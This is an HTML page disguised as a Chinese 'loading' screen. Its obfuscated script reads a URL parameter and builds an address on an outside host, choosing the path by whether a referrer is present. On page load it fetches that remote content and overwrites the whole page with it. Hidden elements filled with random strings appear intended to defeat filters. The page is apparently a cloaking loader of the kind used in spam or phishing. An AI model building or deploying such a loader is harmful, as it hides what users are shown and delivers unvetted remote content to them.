<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WIzQNuRcfH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WIzQNuRcfH .d0CjGHlnpq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WIzQNuRcfH .content {
            line-height: 50px;
            text-align: center
        }

        .WIzQNuRcfH .img {
            width: 100%
        }

        .WIzQNuRcfH .FxsLiaAH {
            text-align: center
        }

        .WIzQNuRcfH .FxsLiaAH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WIzQNuRcfH .FxsLiaAH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WIzQNuRcfH .FxsLiaAH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WIzQNuRcfH .FxsLiaAH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WIzQNuRcfH .FxsLiaAH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WIzQNuRcfH .FxsLiaAH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WIzQNuRcfH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function caK0fqTAzcO1R(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FG25hd = caK0fqTAzcO1R('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FG25hd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FG25hd +".html?a=share";
		}
		
        mf3nc4C=url+"#"+new Date().getTime();
        mf3nc4C && function() {
            $.get(mf3nc4C, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>bVPuOCk9U3105</div>
<p  style='display:none'>Aa3yjNIMYO04yU4dcpCfqbnHZ32aKSBK1WXHIqk</p>
<div style='display:none'>bVPuOCk9U3105</div><div class="WIzQNuRcfH">
    <div class="d0CjGHlnpq">
        <div class="FxsLiaAH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>M25nbuLvkZp6OfrqDuCcguPt1yfA1T27oOIWjSoVVGHFnlg</a>
<p  style='display:none'>D2mDH6SzwgvDUx4WqCHfPD0X77yGROtSltXZZrVEME7dyFswvzpij9TzlXLgh82rDw4kC94yhmhMahvPjcopQ</p>
<h1 style='display:none' >PZHT1g2AHO8efeAqx9ezcQUA7GmgsMN2DmkG9s9bs6sl5RUCwYigKTENMooUDJWwYT7MH7Bz1fYyHtHqPtXrxnH3kDJTwdyh2</h1>
<span style='display:none'>wQj1LtRfxu6zBH1tWGQklyQoiSoaRjc8kZzTE5SclIIIUaol8eZPVpS8r2syuUGMYd1Pcc5HE8VjD</span>
<img  src='' style='display:none'>
<div style='display:none'>rDMU2KByUPB8fPItnT6ITIF2WDz</div>
<h1 style='display:none' >PZHT1g2AHO8efeAqx9ezcQUA7GmgsMN2DmkG9s9bs6sl5RUCwYigKTENMooUDJWwYT7MH7Bz1fYyHtHqPtXrxnH3kDJTwdyh2</h1>
<p  style='display:none'>D2mDH6SzwgvDUx4WqCHfPD0X77yGROtSltXZZrVEME7dyFswvzpij9TzlXLgh82rDw4kC94yhmhMahvPjcopQ</p>
<p  style='display:none'>D2mDH6SzwgvDUx4WqCHfPD0X77yGROtSltXZZrVEME7dyFswvzpij9TzlXLgh82rDw4kC94yhmhMahvPjcopQ</p></body>
</html>